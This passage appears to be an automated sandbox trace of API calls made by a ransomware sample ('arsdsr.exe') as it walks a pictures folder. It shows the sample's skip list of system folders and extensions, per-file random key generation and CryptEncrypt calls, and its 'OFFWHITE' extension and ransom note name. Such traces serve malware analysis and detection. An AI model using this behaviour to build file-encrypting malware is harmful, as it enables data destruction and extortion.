lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile27.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" [0146.751] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.751] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.751] PathFindExtensionW (pszPath="usertile27.bmp") returned=".bmp" [0146.751] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.751] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.751] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.751] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.751] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.751] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.751] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.751] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.751] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.751] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.751] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.751] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.751] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.751] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.751] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.751] lstrcmpiW (lpString1="usertile27.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.751] GetProcessHeap () returned 0x500000 [0146.751] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5470b8 [0146.751] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.752] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.752] GetProcessHeap () returned 0x500000 [0146.752] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526700 [0146.752] GetProcessHeap () returned 0x500000 [0146.752] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526718 [0146.752] GetProcessHeap () returned 0x500000 [0146.752] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x562c00 [0146.752] GetProcessHeap () returned 0x500000 [0146.752] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x562d08 [0146.752] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.752] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.752] SystemFunction036 (in: RandomBuffer=0x526700, RandomBufferLength=0x10 | out: RandomBuffer=0x526700) returned 1 [0146.752] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.752] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.752] SystemFunction036 (in: RandomBuffer=0x526718, RandomBufferLength=0x10 | out: RandomBuffer=0x526718) returned 1 [0146.752] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.752] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.752] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x562c00*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x562c00*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.752] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.752] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.752] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x562d08*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x562d08*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.753] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.753] SetLastError (dwErrCode=0x0) [0146.753] WriteFile (in: hFile=0xffffffff, lpBuffer=0x562c00, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.753] GetLastError () returned 0x6 [0146.753] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43e62d, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae43e62d, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3177db, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile28.bmp", cAlternateFileName="")) returned 1 [0146.753] lstrcmpiW (lpString1="usertile28.bmp", lpString2=".") returned 1 [0146.753] lstrcmpiW (lpString1="usertile28.bmp", lpString2="..") returned 1 [0146.753] lstrcmpiW (lpString1="usertile28.bmp", lpString2="...") returned 1 [0146.753] lstrcmpiW (lpString1="usertile28.bmp", lpString2="windows") returned -1 [0146.753] lstrcmpiW (lpString1="usertile28.bmp", lpString2="$recycle.bin") returned 1 [0146.753] lstrcmpiW (lpString1="usertile28.bmp", lpString2="rsa") returned 1 [0146.753] lstrcmpiW (lpString1="usertile28.bmp", lpString2="ntuser.dat") returned 1 [0146.753] lstrcmpiW (lpString1="usertile28.bmp", lpString2="programdata") returned 1 [0146.753] lstrcmpiW (lpString1="usertile28.bmp", lpString2="appdata") returned 1 [0146.753] lstrcmpiW (lpString1="usertile28.bmp", lpString2="program files") returned 1 [0146.753] lstrcmpiW (lpString1="usertile28.bmp", lpString2="program files (x86)") returned 1 [0146.753] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.753] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile28.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" [0146.753] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.753] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.753] PathFindExtensionW (pszPath="usertile28.bmp") returned=".bmp" [0146.753] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.753] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.753] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.753] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.753] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.753] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.753] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.753] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.753] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.753] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.754] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.754] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.754] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.754] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.754] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.754] lstrcmpiW (lpString1="usertile28.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.754] GetProcessHeap () returned 0x500000 [0146.754] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5470c8 [0146.754] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.754] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.754] GetProcessHeap () returned 0x500000 [0146.754] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526730 [0146.754] GetProcessHeap () returned 0x500000 [0146.754] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526748 [0146.754] GetProcessHeap () returned 0x500000 [0146.754] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x562e10 [0146.754] GetProcessHeap () returned 0x500000 [0146.754] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x562f18 [0146.754] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.754] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.754] SystemFunction036 (in: RandomBuffer=0x526730, RandomBufferLength=0x10 | out: RandomBuffer=0x526730) returned 1 [0146.754] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.754] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.754] SystemFunction036 (in: RandomBuffer=0x526748, RandomBufferLength=0x10 | out: RandomBuffer=0x526748) returned 1 [0146.754] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.754] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.754] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x562e10*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x562e10*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.755] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.755] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.755] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x562f18*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x562f18*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.755] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.755] SetLastError (dwErrCode=0x0) [0146.755] WriteFile (in: hFile=0xffffffff, lpBuffer=0x562e10, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.755] GetLastError () returned 0x6 [0146.755] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43e62d, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae43e62d, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd33d939, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile29.bmp", cAlternateFileName="")) returned 1 [0146.755] lstrcmpiW (lpString1="usertile29.bmp", lpString2=".") returned 1 [0146.755] lstrcmpiW (lpString1="usertile29.bmp", lpString2="..") returned 1 [0146.755] lstrcmpiW (lpString1="usertile29.bmp", lpString2="...") returned 1 [0146.755] lstrcmpiW (lpString1="usertile29.bmp", lpString2="windows") returned -1 [0146.755] lstrcmpiW (lpString1="usertile29.bmp", lpString2="$recycle.bin") returned 1 [0146.755] lstrcmpiW (lpString1="usertile29.bmp", lpString2="rsa") returned 1 [0146.755] lstrcmpiW (lpString1="usertile29.bmp", lpString2="ntuser.dat") returned 1 [0146.755] lstrcmpiW (lpString1="usertile29.bmp", lpString2="programdata") returned 1 [0146.755] lstrcmpiW (lpString1="usertile29.bmp", lpString2="appdata") returned 1 [0146.755] lstrcmpiW (lpString1="usertile29.bmp", lpString2="program files") returned 1 [0146.755] lstrcmpiW (lpString1="usertile29.bmp", lpString2="program files (x86)") returned 1 [0146.755] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.755] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile29.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" [0146.755] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.755] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.756] PathFindExtensionW (pszPath="usertile29.bmp") returned=".bmp" [0146.756] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.756] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.756] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.756] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.756] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.756] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.756] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.756] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.756] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.756] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.756] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.756] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.756] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.756] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.756] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.756] lstrcmpiW (lpString1="usertile29.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.756] GetProcessHeap () returned 0x500000 [0146.756] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5470d8 [0146.756] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.756] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.756] GetProcessHeap () returned 0x500000 [0146.756] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526760 [0146.756] GetProcessHeap () returned 0x500000 [0146.756] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526778 [0146.756] GetProcessHeap () returned 0x500000 [0146.756] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x563020 [0146.757] GetProcessHeap () returned 0x500000 [0146.757] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x563128 [0146.757] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.757] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.757] SystemFunction036 (in: RandomBuffer=0x526760, RandomBufferLength=0x10 | out: RandomBuffer=0x526760) returned 1 [0146.757] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.757] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.757] SystemFunction036 (in: RandomBuffer=0x526778, RandomBufferLength=0x10 | out: RandomBuffer=0x526778) returned 1 [0146.757] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.757] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.757] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x563020*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x563020*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.757] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.757] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.757] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x563128*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x563128*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.758] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.758] SetLastError (dwErrCode=0x0) [0146.758] WriteFile (in: hFile=0xffffffff, lpBuffer=0x563020, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.758] GetLastError () returned 0x6 [0146.758] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae46478a, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae46478a, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3fc00f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile30.bmp", cAlternateFileName="")) returned 1 [0146.758] lstrcmpiW (lpString1="usertile30.bmp", lpString2=".") returned 1 [0146.758] lstrcmpiW (lpString1="usertile30.bmp", lpString2="..") returned 1 [0146.758] lstrcmpiW (lpString1="usertile30.bmp", lpString2="...") returned 1 [0146.758] lstrcmpiW (lpString1="usertile30.bmp", lpString2="windows") returned -1 [0146.758] lstrcmpiW (lpString1="usertile30.bmp", lpString2="$recycle.bin") returned 1 [0146.758] lstrcmpiW (lpString1="usertile30.bmp", lpString2="rsa") returned 1 [0146.758] lstrcmpiW (lpString1="usertile30.bmp", lpString2="ntuser.dat") returned 1 [0146.758] lstrcmpiW (lpString1="usertile30.bmp", lpString2="programdata") returned 1 [0146.758] lstrcmpiW (lpString1="usertile30.bmp", lpString2="appdata") returned 1 [0146.758] lstrcmpiW (lpString1="usertile30.bmp", lpString2="program files") returned 1 [0146.758] lstrcmpiW (lpString1="usertile30.bmp", lpString2="program files (x86)") returned 1 [0146.758] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.758] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile30.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" [0146.758] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.758] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.758] PathFindExtensionW (pszPath="usertile30.bmp") returned=".bmp" [0146.758] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.758] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.758] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.758] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.758] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.758] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.758] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.758] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.759] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.759] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.759] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.759] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.759] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.759] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.759] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.759] lstrcmpiW (lpString1="usertile30.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.759] GetProcessHeap () returned 0x500000 [0146.759] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5470e8 [0146.759] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.773] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.773] GetProcessHeap () returned 0x500000 [0146.773] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x526790 [0146.773] GetProcessHeap () returned 0x500000 [0146.773] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5267a8 [0146.773] GetProcessHeap () returned 0x500000 [0146.773] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x563230 [0146.773] GetProcessHeap () returned 0x500000 [0146.773] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x563338 [0146.773] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.773] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.773] SystemFunction036 (in: RandomBuffer=0x526790, RandomBufferLength=0x10 | out: RandomBuffer=0x526790) returned 1 [0146.773] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.774] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.774] SystemFunction036 (in: RandomBuffer=0x5267a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5267a8) returned 1 [0146.774] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.774] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.774] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x563230*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x563230*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.774] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.774] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.774] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x563338*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x563338*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.774] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.774] SetLastError (dwErrCode=0x0) [0146.774] WriteFile (in: hFile=0xffffffff, lpBuffer=0x563230, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.774] GetLastError () returned 0x6 [0146.774] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae48a8e7, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae48a8e7, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3fc00f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile31.bmp", cAlternateFileName="")) returned 1 [0146.774] lstrcmpiW (lpString1="usertile31.bmp", lpString2=".") returned 1 [0146.775] lstrcmpiW (lpString1="usertile31.bmp", lpString2="..") returned 1 [0146.775] lstrcmpiW (lpString1="usertile31.bmp", lpString2="...") returned 1 [0146.775] lstrcmpiW (lpString1="usertile31.bmp", lpString2="windows") returned -1 [0146.775] lstrcmpiW (lpString1="usertile31.bmp", lpString2="$recycle.bin") returned 1 [0146.775] lstrcmpiW (lpString1="usertile31.bmp", lpString2="rsa") returned 1 [0146.775] lstrcmpiW (lpString1="usertile31.bmp", lpString2="ntuser.dat") returned 1 [0146.775] lstrcmpiW (lpString1="usertile31.bmp", lpString2="programdata") returned 1 [0146.775] lstrcmpiW (lpString1="usertile31.bmp", lpString2="appdata") returned 1 [0146.775] lstrcmpiW (lpString1="usertile31.bmp", lpString2="program files") returned 1 [0146.775] lstrcmpiW (lpString1="usertile31.bmp", lpString2="program files (x86)") returned 1 [0146.775] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.775] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile31.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" [0146.775] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.775] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.775] PathFindExtensionW (pszPath="usertile31.bmp") returned=".bmp" [0146.775] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.775] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.775] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.775] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.775] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.775] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 